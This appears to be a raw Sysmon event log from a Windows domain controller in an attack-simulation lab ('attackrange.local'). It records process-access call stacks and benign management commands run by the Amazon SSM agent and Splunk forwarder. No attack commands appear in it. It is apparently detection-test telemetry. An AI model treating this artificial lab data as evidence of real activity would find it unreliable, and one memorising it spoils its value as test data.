09:20:20.929{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053896Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.929{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053895Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.929{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053894Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.929{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053893Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.929{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD4-6151-5600-00000000FD01}3348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053892Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.928{5EBD8912-8CD2-6151-4300-00000000FD01}37603896C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{5EBD8912-8CD4-6151-5600-00000000FD01}3348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+6f23e 154100x80000000000000001053891Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.928{5EBD8912-8CD4-6151-5600-00000000FD01}3348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Amazon\PVDriver'" "| Select-Object" "Name, Version" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000001053890Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.892{5EBD8912-8CBD-6151-0B00-00000000FD01}6402908C:\Windows\system32\lsass.exe{5EBD8912-8CD4-6151-5500-00000000FD01}4012C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053889Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.892{5EBD8912-8CBD-6151-0B00-00000000FD01}6402908C:\Windows\system32\lsass.exe{5EBD8912-8CD4-6151-5500-00000000FD01}4012C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053888Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.889{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD4-6151-5500-00000000FD01}4012C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053887Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.882{5EBD8912-8CD2-6151-4700-00000000FD01}38483868C:\Windows\system32\conhost.exe{5EBD8912-8CD4-6151-5500-00000000FD01}4012C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053886Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.880{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053885Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.880{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053884Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.880{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053883Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.880{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053882Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.880{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053881Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.880{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053880Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.880{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053879Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.879{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053878Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.879{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053877Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.879{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD4-6151-5500-00000000FD01}4012C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x80000000000000001053876Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.879{5EBD8912-8CD4-6151-5400-00000000FD01}3948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\composite.xmlMD5=BAA3D9652166DC4163F7323B34F168FA,SHA256=0A1E4AAE2B282671AA08BBBF61D7B1808B52B350A12845444CD028CBDBBDA44D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053875Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.879{5EBD8912-8CD2-6151-4300-00000000FD01}37603936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{5EBD8912-8CD4-6151-5500-00000000FD01}4012C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+6f23e 154100x80000000000000001053874Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.879{5EBD8912-8CD4-6151-5500-00000000FD01}4012C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 23542300x80000000000000001053873Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.847{5EBD8912-8CD4-6151-5100-00000000FD01}3656NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053872Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.839{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD4-6151-5400-00000000FD01}3948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053871Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.824{5EBD8912-8CD4-6151-5400-00000000FD01}39483960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053870Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.589{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD4-6151-5400-00000000FD01}3948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053869Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.589{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053868Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 